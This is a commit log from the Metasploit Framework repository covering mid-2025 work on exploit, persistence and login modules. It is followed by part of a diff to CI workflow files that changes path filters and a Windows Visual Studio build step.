Some WebLogic server versions report their version with a dash
between 'Server' and 'Version', like
'<p id="footerVersion">WebLogic Server-Version: 12.2.1.3.0</p>'
2025-09-23 09:58:50 +02:00
cgranleese-r7 a4f9dc7f13 Fixes deprecation message logic when no data object present 2025-09-23 08:38:14 +01:00
Brendan 052fdb7234 Merge pull request #20512 from cdelafuente-r7/fix_native_wth_gcc15
Fix issue with native extensions and GCC 15
2025-09-22 15:37:08 -05:00
Brendan e6e7a455e5 Merge pull request #20540 from Chocapikk/tips
Add new helpful tips to COMMON_TIPS for better usability
2025-09-22 13:25:59 -05:00
Echo_Slow b51cc87f88 Update freepbx_unauth_sqli_to_rce.rb
Performed manual cleanup by observing the error log of msftidy.  Checked for original functionality, the exploit still works.
2025-09-22 17:34:00 +02:00
Echo_Slow 6b183ba3b4 Update freepbx_unauth_sqli_to_rce.rb
Used rubocop -A option
2025-09-22 16:49:19 +02:00
Echo_Slow 9c901e7a46 Merge branch 'freepbx_unauth_sqli_to_rce' of https://github.com/EchoSl0w/metasploit-framework into freepbx_unauth_sqli_to_rce 2025-09-22 16:47:34 +02:00
Echo_Slow a1973e9f72 Update freepbx_unauth_sqli_to_rce.rb
Used rubocop with -A option.
2025-09-22 16:45:29 +02:00
Echo_Slow c0f4efd87d Update modules/exploits/unix/http/freepbx_unauth_sqli_to_rce.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-09-22 16:42:22 +02:00
cgranleese-r7 13c3f4349d Adds exception and change SSL socket initialisation 2025-09-22 14:57:46 +01:00
Echo_Slow 09207eb450 Update freepbx_unauth_sqli_to_rce.rb to account for slow systems 2025-09-22 13:18:32 +02:00
Echo_Slow b54dfddc25 Update modules/exploits/unix/http/freepbx_unauth_sqli_to_rce.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2025-09-22 13:17:28 +02:00
Echo_Slow 75c8efbc7d Update freepbx_unauth_sqli_to_rce.rb
Made the code more readable
2025-09-22 11:26:11 +02:00
Echo_Slow 19074eef02 Add exploit for CVE-2025-57819
Added an exploit script for unauthenticated remote code execution targeting FreePBX
2025-09-21 22:56:19 +02:00
Jeff McJunkin 893a4a5c98 failure.rb: Make comments accurate again 2025-09-19 14:47:03 -07:00
Jeff McJunkin 094fa8191a Update lib/msf/core/module/failure.rb
Per @smcintyre-r7's suggestion, which is a damned good one.

Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2025-09-19 14:45:33 -07:00
Jeff McJunkin 1dc1a24f73 Improve RHOST validation logic inside report_failure 2025-09-19 14:30:27 -07:00
Jeff McJunkin 4b2a354d21 Prevent file: paths from being saved as host addresses in report_failure
Added check to prevent saving file paths as host addresses.
2025-09-19 14:07:32 -07:00
h00die ae2f7d8de1 better cleanup for launch_plist 2025-09-19 13:42:15 -04:00
h00die d2af76cdd0 update plist persistence to mixin 2025-09-19 13:42:14 -04:00
jenkins-metasploit a496ad0ac7 automatic module_metadata_base.json update 2025-09-18 20:48:23 +00:00
jheysel-r7 8b539f7e96 Merge pull request #20524 from h00die/modern_persistence_yum
update yum to persistence module
2025-09-18 13:39:57 -07:00
h00die 6c5522cdba Update documentation/modules/exploit/linux/persistence/init_systemd_override.md
Co-authored-by: Brendan <bwatters@rapid7.com>
2025-09-18 16:25:54 -04:00
h00die 160cf5c55b peer review for yum persistence 2025-09-18 16:15:24 -04:00
Spencer McIntyre ed88e5397c Merge pull request #20553 from BenoitDePaoli/fix/userpass_password_persistence
fix: ensure USERPASS_FILE credentials store password (set private_type)
2025-09-18 15:39:08 -04:00
h00die 15f4abd1b2 update yum to persistence module 2025-09-18 15:36:44 -04:00
jenkins-metasploit dbc7af30b7 automatic module_metadata_base.json update 2025-09-18 16:05:00 +00:00
Spencer McIntyre cf3abc280e Merge pull request #20533 from cdelafuente-r7/feat/mitre/add_ref
Add T1003 "OS credential dumping" MITRE technique reference
2025-09-18 11:56:33 -04:00
happybear-21 f844377d58 added: documentation 2025-09-18 21:10:23 +05:30
jenkins-metasploit 05273263c9 automatic module_metadata_base.json update 2025-09-18 10:13:16 +00:00
Diego Ledda c718a965d7 Merge pull request #20508 from h00die/modern_persistence_cron
update cron to persistence mixin
2025-09-18 12:04:00 +02:00
Diego Ledda cb2f3992de chore: fix white-space issue 2025-09-18 11:48:17 +02:00
Metasploit c1b9cc7150 Bump version of framework to 6.4.90 2025-09-18 03:32:20 -05:00
h00die 6ddaa076c1 Apply suggestions from code review
Co-authored-by: Diego Ledda <diego_ledda@rapid7.com>
2025-09-17 15:41:25 -04:00
bwatters-r7 1891ebef87 add x64 acceptance tests, and use single, release payload 2025-09-17 12:21:30 -05:00
cgranleese-r7 f26c14f05a Address PR feedback 2025-09-17 15:38:08 +01:00
BenoitDePaoli 08c43670ff fix: ensure USERPASS_FILE credentials store password (set private_type) 2025-09-17 15:42:03 +02:00
jenkins-metasploit 99c24c37f2 automatic module_metadata_base.json update 2025-09-17 13:29:46 +00:00
Diego Ledda 448381ee96 Merge pull request #20548 from xHector1337/fix-exploits/linux/samba/is_known_pipename.rb
Fixes samba share iteration in linux/samba/is_known_pipename
2025-09-17 15:21:27 +02:00
Diego Ledda b5b1ac237a Update is_known_pipename.rb 2025-09-17 11:04:28 +02:00
jenkins-metasploit a333c81338 automatic module_metadata_base.json update 2025-09-17 08:06:57 +00:00
msutovsky-r7 dc8d67538c Land #20536, adds docker image persistence module
docker image persistence module
2025-09-17 09:56:16 +02:00
jenkins-metasploit 076fd0cc45 automatic module_metadata_base.json update 2025-09-16 22:06:51 +00:00
jheysel-r7 81ce0f8868 Merge pull request #20521 from h00die/modern_persistence_systemd
update systemd to persistence mixin
2025-09-16 14:56:26 -07:00
jenkins-metasploit 5394ff4b1b automatic module_metadata_base.json update 2025-09-16 20:30:50 +00:00
jheysel-r7 58dfd4d0ca Merge pull request #20507 from remmons-r7/commvault_rce_cve_2025_57790_cve_2025_57791
Exploit Module for CVE-2025-57790/CVE-2025-57791 - Commvault Unauthenticated RCE
2025-09-16 13:22:18 -07:00
h00die 73c6ed2528 peer review for init_systemd_override persistence 2025-09-16 16:08:30 -04:00
h00die 93bc79e87d peer review for docker_image persistence 2025-09-16 15:57:24 -04:00
Muzaffer Umut ŞAHİN 7c5fce6872 Add nil check logic 2025-09-16 19:49:55 +03:00
Christophe De La Fuente 788b9c27b4 Use sub-technique and add missing modules 2025-09-16 18:39:23 +02:00
msutovsky-r7 5eecb1feac Land #20535, adds a test login scanner and fixes ANONYMOUS_LOGIN
Add a test login scanner and fix ANONYMOUS_LOGIN
2025-09-16 16:51:26 +02:00
jenkins-metasploit 76977aeb61 automatic module_metadata_base.json update 2025-09-16 13:06:52 +00:00
msutovsky-r7 32aa0d84e4 Land #20525, moves obsidian plugin module to persistence category and mixin
update obsidian to persistence mixin
2025-09-16 14:58:15 +02:00
jenkins-metasploit 555423b2eb automatic module_metadata_base.json update 2025-09-15 23:04:23 +00:00
jheysel-r7 02e35f7e92 Merge pull request #20520 from h00die/modern_persistence_openrc
update openrc to persistence mixin
2025-09-15 15:54:31 -07:00
h00die ebe0234ddb Update documentation/modules/exploit/linux/persistence/init_openrc.md
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2025-09-15 16:30:17 -04:00
jenkins-metasploit ab1dd8787c automatic module_metadata_base.json update 2025-09-15 19:56:40 +00:00
Brendan 1ec10ec877 Merge pull request #20510 from h00die/modern_persistence_rc_local
update rc_local to persistence mixin
2025-09-15 14:47:48 -05:00
Spencer McIntyre a538a8ea14 Merge pull request #20483 from dledda-r7/fix/update-metasploit-payloads-runner
Update CI for meterpreter vs2022
2025-09-15 15:43:16 -04:00
remmons-r7 eddc81f10c Update commvault_rce_cve_2025_57790_cve_2025_57791.md
Update the example usage terminal output to reflect module changes.
2025-09-15 11:37:57 -05:00
remmons-r7 12b78c086d Update commvault_rce_cve_2025_57790_cve_2025_57791.rb
Remove an empty line that msftidy doesn't like
2025-09-15 11:19:49 -05:00
remmons-r7 ddc5abf20c Update commvault_rce_cve_2025_57790_cve_2025_57791.rb
Remove a commented out line that isn't needed.
2025-09-15 10:56:30 -05:00
remmons-r7 bb3a26cff1 Implement peer review suggestions for Commvault module
Implementing commvault_rce_cve_2025_57790_cve_2025_57791.rb changes from peer review.
2025-09-15 10:54:34 -05:00
remmons-r7 b754b7027c Merge branch 'rapid7:master' into commvault_rce_cve_2025_57790_cve_2025_57791 2025-09-15 10:47:38 -05:00
dledda-r7 20345c2234 fix: replace Start-Process with Invoke-Command in meterpreter acceptance 2025-09-15 10:12:45 -04:00
dledda-r7 7be73c59e9 fix: replace Start-Process with Invoke-Command in meterpreter acceptance 2025-09-15 09:33:54 -04:00
dledda-r7 b30c3e32c6 fix: replace Start-Process with Invoke-Command in meterpreter acceptance 2025-09-15 08:53:39 -04:00
dledda-r7 85c65bd48f fix: replace Start-Process with Invoke-Command in meterpreter acceptance 2025-09-15 08:04:35 -04:00
happybear-21 aa264f59d4 fixed: rubocop offenses (file: specialfolder_leak.rb) 2025-09-14 23:45:32 +05:30
happybear-21 2ea4f7cdb0 fixed: rubocop offenses (file: icon_environment_datablock_leak.rb) 2025-09-14 23:35:46 +05:30
happybear-21 97495cdaa4 fixed: rubocop offenses 2025-09-14 23:28:17 +05:30
happybear-21 65549ba868 added: smb share server, completed: requested change 2025-09-14 15:43:58 +05:30
happybear-21 5a82ea53b9 added: smb for lateral movement, updated: description and icon_path as optional, used: faker module to generate data 2025-09-14 15:34:26 +05:30
happybear-21 3aa18b1541 updated: description and icon_path as optional, added: faker module to generate description and icon_path, fixed: minor changes 2025-09-14 15:19:05 +05:30
jenkins-metasploit 8ad35c0534 automatic module_metadata_base.json update 2025-09-12 23:27:45 +00:00
jheysel-r7 b45a3caaa5 Merge pull request #20509 from h00die/modern_persistence_motd
update motd to persistence mixin
2025-09-12 16:18:08 -07:00
Metasploit 831912a81b Bump version of framework to 6.4.89 2025-09-12 16:38:50 -05:00
jenkins-metasploit 4328e9951f automatic module_metadata_base.json update 2025-09-12 21:22:03 +00:00
jheysel-r7 e473c08b61 Merge pull request #20542 from zeroSteiner/fix/smb-kerberos-login-exp
Fix a Kerberos Error Edge Case When Logging In
2025-09-12 14:13:54 -07:00
Spencer McIntyre c27138a5bf Filter for an edge case in response codes 2025-09-12 16:49:49 -04:00
Spencer McIntyre 829166def4 Fix a regression in smb_login 2025-09-12 16:49:46 -04:00
jenkins-metasploit 3f1698f209 automatic module_metadata_base.json update 2025-09-12 19:56:02 +00:00
jheysel-r7 796404c1d7 Merge pull request #20541 from zeroSteiner/fix/smb-login-nil-passwords
Fix a regression in smb_login
2025-09-12 12:42:19 -07:00
Spencer McIntyre 3e396ce31f Deregister KrbCacheMode because it's ignored 2025-09-12 15:11:23 -04:00
Spencer McIntyre 5d748b9ba3 Fix a regression in smb_login 2025-09-12 14:27:32 -04:00
Chocapikk 93472898ce Add new helpful tips to COMMON_TIPS for better usability 2025-09-12 19:49:45 +02:00
Spencer McIntyre 59f1dd4879 Merge pull request #20529 from bwatters-r7/docs/update-contributing
Add section on Vibecoding and AI/LLM
2025-09-12 13:01:26 -04:00
jenkins-metasploit dbc7867dd7 automatic module_metadata_base.json update 2025-09-12 12:49:27 +00:00
msutovsky-r7 c901b5a306 Land #20526, moves at_persistence to persistence category and mixin
Modern persistence: at
2025-09-12 14:41:00 +02:00
mwalas-r7 d3d2950e80 Merge pull request #20537 from zeroSteiner/fix/null-cache-path
Check the path is set before checking the file exists
2025-09-12 05:18:37 -07:00
h00die 5abe0f57b7 Update documentation/modules/exploit/multi/persistence/at.md
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-09-12 14:13:27 +02:00
h00die 15cdbfac2e update at persistence to use attck ref 2025-09-12 14:13:26 +02:00
h00die fd1d70ef93 update at persistence to mixin 2025-09-12 14:13:26 +02:00
h00die 403d02698b systemd service override persistence 2025-09-11 17:29:13 -04:00
jenkins-metasploit cc48f38e21 automatic module_metadata_base.json update 2025-09-11 18:34:00 +00:00
jheysel-r7 96a83143f1 Merge pull request #20479 from msutovsky-r7/exploit/sitecore/postauth-rce
Adds modules for Sitecore XP post-auth remote code executions (CVE-2025-34510, CVE-2025-34511)
2025-09-11 11:25:27 -07:00
jenkins-metasploit dd7c491d9e automatic module_metadata_base.json update 2025-09-11 17:06:52 +00:00
Diego Ledda 985af001d2 Merge pull request #20497 from h00die/modern_persistence_autostart
update autostart to persistence mixin
2025-09-11 18:58:32 +02:00
jheysel-r7 a3a1e146f0 Apply suggestions from code review 2025-09-11 09:40:34 -07:00
Spencer McIntyre e197f532db Check the path is set before checking the file exists 2025-09-11 12:35:30 -04:00
h00die bce1a19927 Update modules/exploits/linux/persistence/init_openrc.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-09-11 12:00:52 -04:00
h00die 00115457f7 Update documentation/modules/exploit/linux/persistence/init_upstart.md
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-09-11 12:00:28 -04:00
h00die 5c52151a06 Update documentation/modules/exploit/linux/persistence/init_upstart.md
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-09-11 12:00:22 -04:00
jenkins-metasploit 947a0ed339 automatic module_metadata_base.json update 2025-09-11 14:54:10 +00:00
Spencer McIntyre afdaf4ff39 Merge pull request #20514 from dledda-r7/fix/remove-unhook-autoload
Removing unhook extension autoload
2025-09-11 10:45:39 -04:00
Martin Sutovsky 5ab864b9b1 Uses between? for version check, clearer webshell upload 2025-09-11 11:04:34 +02:00
Diego Ledda 80c5e41650 Merge pull request #20495 from h00die/modern_persistence_apt
update apt_package_manager to persistence mixin
2025-09-11 10:49:08 +02:00
Martin Sutovsky 00bd70751c Updates docs 2025-09-11 10:41:28 +02:00
Metasploit f494b9871a Bump version of framework to 6.4.88 2025-09-11 03:32:35 -05:00
h00die 71e9602eba Update modules/exploits/linux/persistence/autostart.rb
Co-authored-by: Diego Ledda <diego_ledda@rapid7.com>
2025-09-10 13:59:23 -04:00
h00die 2bf5264aff docker image persistence module 2025-09-10 13:45:22 -04:00
Diego Ledda 4104497498 Merge pull request #20502 from zeroSteiner/feat/refactor-pe-compiling
Update PE EXE Templates
2025-09-10 12:37:35 +02:00
jenkins-metasploit 1fe1512596 automatic module_metadata_base.json update 2025-09-10 08:23:55 +00:00
Diego Ledda 1314f5d0bb Merge pull request #20455 from Chocapikk/aitemi_m300_time_rce
Add unauthenticated RCE on Shenzhen Aitemi M300 MT02 (CVE-2025-34152)
2025-09-10 10:12:41 +02:00
h00die 489e0ca404 docker image persistence module draft 2025-09-09 22:53:06 -04:00
h00die adde043c22 upstart updated with mixin updates 2025-09-09 17:03:25 -04:00
h00die b9534ffbe4 use attck ref in upstart persistence module 2025-09-09 17:03:25 -04:00
h00die ccd1fe3d78 update upstart to persistence mixin 2025-09-09 17:03:25 -04:00
h00die e3cad5b772 systemd updated with mixin updates 2025-09-09 16:19:41 -04:00
h00die 296961137e use attck ref in systemd persistence module 2025-09-09 16:19:41 -04:00
h00die f240fed592 use attck ref in systemd persistence module 2025-09-09 16:19:41 -04:00
h00die 8b6aede3e4 update systemd to persistence mixin 2025-09-09 16:19:41 -04:00
h00die 16e407fa47 rc_local updated with mixin updates 2025-09-09 15:42:46 -04:00
h00die 945fd8feb1 use attck ref in openrc persistence module 2025-09-09 15:42:46 -04:00
h00die c2ca191711 update openrc to persistence mixin 2025-09-09 15:42:46 -04:00
h00die 2bd3ea0e6a rc_local updated with mixin updates 2025-09-09 14:58:09 -04:00
h00die feb4c6f855 rc_local updated with mixin updates 2025-09-09 14:35:35 -04:00
h00die e0f350f294 update rc_local to persistence mixin 2025-09-09 14:35:35 -04:00
h00die 8bc611465b motd updated with mixin updates 2025-09-09 14:29:29 -04:00
h00die e1e4e43535 update motd to persistence mixin 2025-09-09 14:29:29 -04:00
Spencer McIntyre 1bd44fa485 Set the anonymous_login option 2025-09-09 13:52:47 -04:00
Spencer McIntyre 30cfc5dbb0 Add a module for testing credential collections 2025-09-09 13:50:55 -04:00
h00die e79c10ac66 cron updated with mixin updates 2025-09-09 11:55:19 -04:00
h00die 9e461ea875 switch to attck ref 2025-09-09 11:50:31 -04:00
h00die 785397bb0c cron to multi with persistence mixin 2025-09-09 11:50:31 -04:00
h00die c4d03023fc autostart updated with mixin updates 2025-09-09 11:47:13 -04:00
h00die fb29084f86 persistence autostart cleanup updates 2025-09-09 10:49:56 -04:00
h00die c3be5ad23c update autostart to persistence mixin 2025-09-09 10:49:56 -04:00
jenkins-metasploit b650776c83 automatic module_metadata_base.json update 2025-09-09 14:36:48 +00:00
h00die 638beeb738 apt persistence updates for mixin 2025-09-09 10:33:10 -04:00
h00die 711d8d0896 persistence apt cleanup updates 2025-09-09 10:28:03 -04:00
h00die db2f9f7792 update apt_package_manager to persistence mixin 2025-09-09 10:28:03 -04:00
Diego Ledda 140232da2c Merge pull request #20534 from h00die/persistence_lib_fixes
adjustments to the persistence lib and landed modules
2025-09-09 16:25:24 +02:00
h00die c4936d1b0f adjustments to the persistence lib and modules 2025-09-09 10:02:06 -04:00
jenkins-metasploit 6df1871523 automatic module_metadata_base.json update 2025-09-09 13:51:25 +00:00
cgranleese-r7 2f27fe4ed5 Merge pull request #19653 from Mathiou04/fix_bugs_in_credentials_collection_enumerator_and_refacto
Fixing multiple bugs in credential generation + refactoring
2025-09-09 14:42:12 +01:00
cgranleese-r7 dbb631ffb6 Adds SSL support to the postgres_login module 2025-09-09 09:56:36 +01:00
Christophe De La Fuente 7ce2bdc979 Add T1003 "OS credential dumping" MITRE technique 2025-09-09 10:45:46 +02:00
jenkins-metasploit 704a8f10b8 automatic module_metadata_base.json update 2025-09-08 23:57:37 +00:00
jheysel-r7 7972017936 Merge pull request #20397 from vognik/CVE-2025-34300
Add Lighthouse Studio unauthenticated RCE (CVE-2025-34300)
2025-09-08 16:48:29 -07:00
jheysel-r7 0e325e6217 Update documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md 2025-09-08 16:29:00 -07:00
Mathieu 736d89bc2c Update the CredentialCollectionSpecs
CredentialCollection: adding various tests that currently fail to demonstrate multiple bugs in the each method

Fix incorrect expectations of currently failing tests

Inline all specs to avoid nesting context

Reverts some test expectations

Some final tidy up

Re-revert tests expectations
2025-09-08 13:09:51 -04:00
Mathieu 4b97240eca Fixes for the CredentialCollection
Fixes trivial bugs when combining additional_publics with user_as_pass

Fixes the fact that no nil credential is generated for additional_publics

Re-implement the each_unfiltered_password_first method (used in case of password spraying) to make all tests pass

First refactoring pass in order to dry the code that iterates on passwords and usernames
2025-09-08 13:08:02 -04:00
Mathieu 14bc1f14fc Change how ldap_login generates its specific credentials for SCHANNEL && KERBEROS auth 2025-09-08 13:02:30 -04:00
Diego Ledda 68940822fd Merge pull request #20494 from h00die/modern_persistence_example
add example linux persistence module
2025-09-08 16:23:20 +02:00
h00die 5c1673bb20 update obsidian to persistence mixin 2025-09-06 15:05:21 -04:00
remmons-r7 8ffc9a3db4 Update commvault_rce_cve_2025_57790_cve_2025_57791.md
Updating module type from "multi" to "windows" in documentation :)
2025-09-05 23:13:10 -05:00
remmons-r7 00114142ff Delete modules/exploits/multi/http/commvault_rce_cve_2025_57790_cve_2025_57791.rb 2025-09-05 23:10:39 -05:00
remmons-r7 e1b6249c23 Delete documentation/modules/exploit/multi/http/commvault_rce_cve_2025_57790_cve_2025_57791.md 2025-09-05 23:09:51 -05:00
remmons-r7 e661388ce6 Revise and move commvault_rce_cve_2025_57790_cve_2025_57791.md
New documentation for the Commvault CVE-2025-57790/CVE-2025-57791 RCE module, updated to reflect module changes.
2025-09-05 23:06:16 -05:00
remmons-r7 be546af7c0 Revise and move commvault_rce_cve_2025_57790_cve_2025_57791.rb
Revised initial module and moved it to windows instead of multi.
2025-09-05 23:04:02 -05:00
remmons-r7 3f7512ba62 Merge branch 'rapid7:master' into commvault_rce_cve_2025_57790_cve_2025_57791 2025-09-05 23:02:01 -05:00
bwatters-r7 c40e4cc8bc Add section on Vibecoding and AI/LLM 2025-09-05 15:15:56 -05:00
Diego Ledda 4ede319b0a fix: review changes 2025-09-05 15:21:49 +02:00
adfoster-r7 5fedbe026b Merge pull request #20519 from cgranleese-r7/adds-base-sessions-path-to-meterpreter-workflow-paths
Adds `lib/msf/base/sessions` path to Meterpreter acceptance workflow paths
2025-09-05 13:07:55 +01:00
cgranleese-r7 0966954549 Adds lib/msf/base/sessions to meterpreter acceptance workflow paths 2025-09-05 07:10:40 +01:00
happybear-21 600ad5777a Issue: #20223
Added Metasploit Auxiliary Module:
[x] Environment Variable Data Block NTLM Leak
[x] Icon Environment Data Block NTLM Leak
[x] Special Folder Data Block NTLM Leak
[x] Windows LNK Padding

Ref:
https://github.com/nafiez/DataBlockNTLMLeak/tree/main
2025-09-05 10:49:08 +05:30
jenkins-metasploit db80e8173a automatic module_metadata_base.json update 2025-09-04 17:31:17 +00:00
Spencer McIntyre e07d174011 Merge pull request #20511 from mwalas-r7/fix/sni-support-for-ssl-scanner
Added SNI support for the ssl_version scanner
2025-09-04 13:22:57 -04:00
Marcin Walas 9fb4966e52 Added SNI support for ssl scanner 2025-09-04 16:12:31 +02:00
Diego Ledda 55d8a3f33c fix: adding issue reference 2025-09-04 14:36:55 +02:00
dwelch-r7 2ca14c900b Merge pull request #20516 from adfoster-r7/fix-msfdb-init-failures-on-nixos
Fix msfdb init failures on NixOs
2025-09-04 12:25:18 +01:00
adfoster-r7 ce3dc123f9 Fix msfdb init failures on nixos 2025-09-04 11:41:30 +01:00
Metasploit 9beacd1980 Bump version of framework to 6.4.87 2025-09-04 03:32:48 -05:00
dledda-r7 96c6a14e95 fix: removing unhook extension autoload 2025-09-03 11:22:02 -04:00
Christophe De La Fuente 4f606bc216 Bump bson and ed25519 versions 2025-09-03 16:27:00 +02:00
remmons-r7 b360d5edc3 Create commvault_rce_cve_2025_57790_cve_2025_57791.md 2025-09-02 15:43:22 -05:00
remmons-r7 a07203c14e Create commvault_rce_cve_2025_57790_cve_2025_57791.rb 2025-09-02 15:39:29 -05:00
h00die 56c692fc3e example persistence cleanup updates 2025-09-01 19:34:57 -04:00
Martin Sutovsky d056164d89 Removes redundant definitions 2025-09-01 15:53:14 +02:00
Martin Sutovsky fa64376c5c Adds comments for login function 2025-09-01 15:50:21 +02:00
Spencer McIntyre 9979af9fd7 Update the specs 2025-08-28 17:59:17 -04:00
Spencer McIntyre 75c1415de4 Add the new exe templates 2025-08-28 17:41:48 -04:00
Spencer McIntyre cf8aa2fc48 Fix the build script 2025-08-28 17:41:28 -04:00
Spencer McIntyre 3af8bd97ad Consistently use the same technique for exe-service 2025-08-28 17:39:57 -04:00
Spencer McIntyre 0e95f25d4b Add the exe_service template to the build script 2025-08-28 17:28:55 -04:00
Spencer McIntyre 0192f314ce Begin normalizing PE templates 2025-08-28 17:28:37 -04:00
h00die 2b249d5626 update linux example persistence 2025-08-28 17:00:05 -04:00
bwatters-r7 090743abbd Update error message when there may be a timeout 2025-08-27 11:04:43 -05:00
Martin Sutovsky a8e97e034c Adds docs 2025-08-26 13:06:57 +02:00
Martin Sutovsky 2533ddf441 Rubocoping 2025-08-26 12:42:28 +02:00
Martin Sutovsky b43b4c9f37 Updates library, addressing comments 2025-08-25 17:49:34 +02:00
h00die 96cc6b479c add example linux persistence module 2025-08-24 08:09:05 -04:00
dledda-r7 53ce08ef6e feat: add stdapi_webcam extension 2025-08-21 07:13:36 -04:00
dledda-r7 0206663565 feat: add stdapi_ui extension 2025-08-21 07:13:36 -04:00
dledda-r7 02995f2f7d feat: add stdapi_railgun extension 2025-08-21 07:13:35 -04:00
dledda-r7 809599a7d6 feat: add stdapi_audio extension 2025-08-21 07:13:35 -04:00
dledda-r7 94cc3d0a29 feat: add stdapi_sys extension 2025-08-21 07:13:34 -04:00
dledda-r7 44efeffef1 fix: removing duplicate dispatchers stdapi_fs and stdapi_net 2025-08-21 07:13:34 -04:00
dledda-r7 2af25bb294 fix: disable already loaded commands to allow multiple stdapi loading 2025-08-21 07:13:34 -04:00
dledda-r7 a265deb37e fix: stdapi_net correct wrapped object alias 2025-08-21 07:13:33 -04:00
dledda-r7 d4c44f9dbf feat: add stdapi_net extension 2025-08-21 07:13:33 -04:00
dledda-r7 4fe4f8fc14 feat: add stdapi_fs extension 2025-08-21 07:13:32 -04:00
dledda-r7 5b9f1c7818 fix: update CI for meterpreter vs2022 2025-08-21 04:06:18 -04:00
Martin Sutovsky da5b20faa4 Creating lib file for shared functionality, adding more reliable check method for CVE-2025-34511, docs init 2025-08-20 10:59:22 +02:00
Martin Sutovsky 8c28c7dbae Code changes for 34510, adds module for CVE-2025-34511 2025-08-20 09:58:26 +02:00
Martin Sutovsky 7ab12460f1 Fixing payloads 2025-08-19 16:11:25 +02:00
Martin Sutovsky 96791403db Adds malicious zip upload 2025-08-19 09:56:23 +02:00
Vognik b13f59128c Added Setup Guide for Windows 2025-08-18 08:20:32 +04:00
Martin Sutovsky 52efe8d6de Module init 2025-08-15 14:37:09 +02:00
Chocapikk f4e71c1e93 Replace Rank 2025-08-14 16:37:13 +02:00
Chocapikk 3022513652 Add CRASH_SERVICE_DOWN and "`" badchar 2025-08-14 16:16:21 +02:00
Valentin Lobstein 46bbec2470 Update modules/exploits/linux/http/aitemi_m300_time_rce.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2025-08-14 16:11:27 +02:00
Valentin Lobstein bd9c2bf231 Update modules/exploits/linux/http/aitemi_m300_time_rce.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-08-14 16:01:59 +02:00
RakRak 383ee010f1 Create wordpress_cp_calendar_sqli.md 2025-08-08 21:58:02 -04:00
Chocapikk baacd6f2bf Update CVE-ID in documentation 2025-08-07 21:54:38 +02:00
Chocapikk ff4ede95cc Remove useless headers 2025-08-07 21:53:14 +02:00
Chocapikk 87eb063460 Add unauthenticated RCE on Shenzhen Aitemi M300 MT02 (CVE-2025-34152) 2025-08-07 18:34:49 +02:00
Vognik 8024900171 fix tests 2025-07-26 03:15:00 +04:00
Maksim Rogov 9696cc57db Merge branch 'rapid7:master' into CVE-2025-34300 2025-07-25 11:02:03 +04:00
Vognik 82eadede83 Code Review Edits from @sjanusz-r7 2025-07-25 05:17:48 +04:00
Maksim Rogov 6e5d474b21 Apply suggestion from @jheysel-r7 in Docs
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2025-07-24 06:23:01 +03:00
Vognik 38b0bd15e1 Code Review Edits 2025-07-24 07:19:25 +04:00
bwatters-r7 dcfa448cf8 Remove now unused timeout 2025-07-23 10:40:24 -05:00
bwatters-r7 07692ff241 Remove errant write_log call and swap to the all-in-one psh_exec rather than execute_script 2025-07-23 09:40:35 -05:00
Vognik e93755adc6 Added WritableDir Option 2025-07-23 11:59:48 +04:00
Vognik d62ef448f1 Code Review Edits 2025-07-22 04:40:14 +04:00
Vognik 1c1b574b81 Removed Debug Print 2025-07-21 21:37:52 +04:00
Vognik d57a36413d Fix Tests 2025-07-21 21:34:41 +04:00
Vognik 6276b27dfc Improved Exploit Stability on Windows 2025-07-21 21:34:01 +04:00
Maksim Rogov 85e97aaaf5 Fix STUDYNAME empty check 2025-07-21 13:14:19 +03:00
Vognik e90396a15f Execute Method Refactoring 2025-07-21 13:59:43 +04:00
Vognik c06a7c477b Check Method Refactoring 2025-07-21 13:06:51 +04:00
Vognik 45a6176a9c Removed Limits 2025-07-21 11:03:24 +04:00
Vognik 6bf385e17a Removed duplicate logging bug 2025-07-21 03:20:34 +04:00
Vognik a836c9bc5e Fixed CVE Format 2025-07-21 03:17:57 +04:00
Vognik 75e1158457 Fixed docs formatting 2025-07-21 03:16:40 +04:00
Vognik e7667d406a Add Lighthouse Studio unauthenticated RCE (CVE-2025-34300) 2025-07-20 15:23:38 +04:00
762 changed files with 18801 additions and 5581 deletions
@@ -44,6 +44,7 @@ on:
- 'Gemfile.lock'
- 'data/templates/**'
- 'modules/payloads/**'
- 'lib/msf/base/sessions/**'
- 'lib/msf/core/payload/**'
- 'lib/msf/core/**'
- 'test/modules/**'
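Review bot: the existing `'lib/msf/core/payload/**'` entry is already subsumed by `'lib/msf/core/**'` two lines below it, so the path filter carries a redundant pattern; the added `'lib/msf/base/sessions/**'` is correct and not covered by any other glob, but while this list is being touched the narrower `lib/msf/core/payload` entry could be dropped.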
@@ -269,12 +269,26 @@ jobs:
working-directory: metasploit-payloads
- name: Build Windows payloads via Visual Studio 2022 Build (Windows)
shell: cmd
shell: pwsh
if: ${{ matrix.meterpreter.name == 'windows_meterpreter' && matrix.os == 'windows-2022' && inputs.build_metasploit_payloads }}
run: |
cd c/meterpreter
git submodule init && git submodule update
make.bat
Set-Location "C:\Program Files (x86)\Microsoft Visual Studio\Installer\"
dir
$InstallPath = "C:\Program Files\Microsoft Visual Studio\2022\Enterprise"
$WorkLoads = '--config "D:\a\metasploit-payloads\metasploit-payloads\metasploit-payloads\c\meterpreter\vs-configs\vs2022.vsconfig"'
$Arguments = ('/c', "vs_installer.exe", 'modify', '--installPath', "`"$InstallPath`"", $WorkLoads, '--quiet', '--norestart', '--nocache')
$process = Start-Process -FilePath cmd.exe -ArgumentList $Arguments -Wait -PassThru -WindowStyle Hidden
if ($process.ExitCode -eq 0) {
Write-Host "components have been successfully added"
} else {
Write-Host "components were not installed"
exit 1
}
Set-Location "D:\a\metasploit-payloads\metasploit-payloads\metasploit-payloads\c\meterpreter"
$r = Invoke-Command -ScriptBlock { cmd.exe /c 'git submodule init && git submodule update' }
Write-Host $r
